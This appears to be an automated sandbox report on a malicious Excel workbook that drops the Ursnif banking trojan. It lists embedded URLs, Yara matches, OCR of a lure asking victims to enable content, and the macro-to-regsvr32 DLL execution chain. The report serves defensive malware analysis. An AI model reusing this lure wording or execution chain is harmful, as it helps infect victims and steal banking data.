Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cortana.ai/api
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cr.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://directory.services.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.windows.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.windows.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows.local
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://management.azure.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://management.azure.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://messaging.office.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officeapps.live.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://onedrive.live.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://settings.outlook.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://tasks.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_00BB35A1

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 12 Once You have Enable Editing, please click E
Source: Screenshot number: 4	Screenshot OCR: Enable Content 13 from the yellow bar above 14 ' , 15 " WHY I CANNOT OPEN THIS DOCUMENT? 17 i
Source: Screenshot number: 8	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? m You are using iOS orA

Found Excel 4.0 Macro with suspicious formulas

Source: 4Y2I7k0.xlsb	Initial sample: EXEC
Source: 4Y2I7k0.xlsb	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Source: 4Y2I7k0.xlsb	Initial sample: Sheet size: 25180
Source: 4Y2I7k0.xlsb	Initial sample: Sheet size: 45240
Source: 4Y2I7k0.xlsb	Initial sample: Sheet size: 38015

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\block.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll			Jump to dropped file

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF1B89 NtMapViewOfSection,	4_2_67AF1B89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF18D1 GetProcAddress,NtCreateSection,memset,	4_2_67AF18D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2485 NtQueryVirtualMemory,	4_2_67AF2485
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB3CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_00BB3CA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB81CD NtQueryVirtualMemory,	4_2_00BB81CD

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2264	4_2_67AF2264
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB6609	4_2_00BB6609
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB7FA8	4_2_00BB7FA8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3348A	4_2_67B3348A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B27AD7	4_2_67B27AD7

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSB@15/71@6/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB19E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_00BB19E7

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{ED20C08D-8AAC-40DA-974E-299A3F2E2000} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1268 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5788 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1268 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5788 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image4.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_67AF1F31 LoadLibraryA,GetProcAddress,

4_2_67AF1F31

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2200 push ecx; ret	4_2_67AF2209
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2253 push ecx; ret	4_2_67AF2263
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB7C20 push ecx; ret	4_2_00BB7C29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BBB67C push ss; retf	4_2_00BBB690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB7F97 push ecx; ret	4_2_00BB7FA7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BBB163 push edx; iretd	4_2_00BBB164
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0677F push esi; iretd	4_2_67B0678A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AFFE6C push ebx; retf	4_2_67AFFE6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0243F push ebp; retf	4_2_67B0244E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B02403 push ebp; retf	4_2_67B0244E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B24475 push ecx; ret	4_2_67B24488
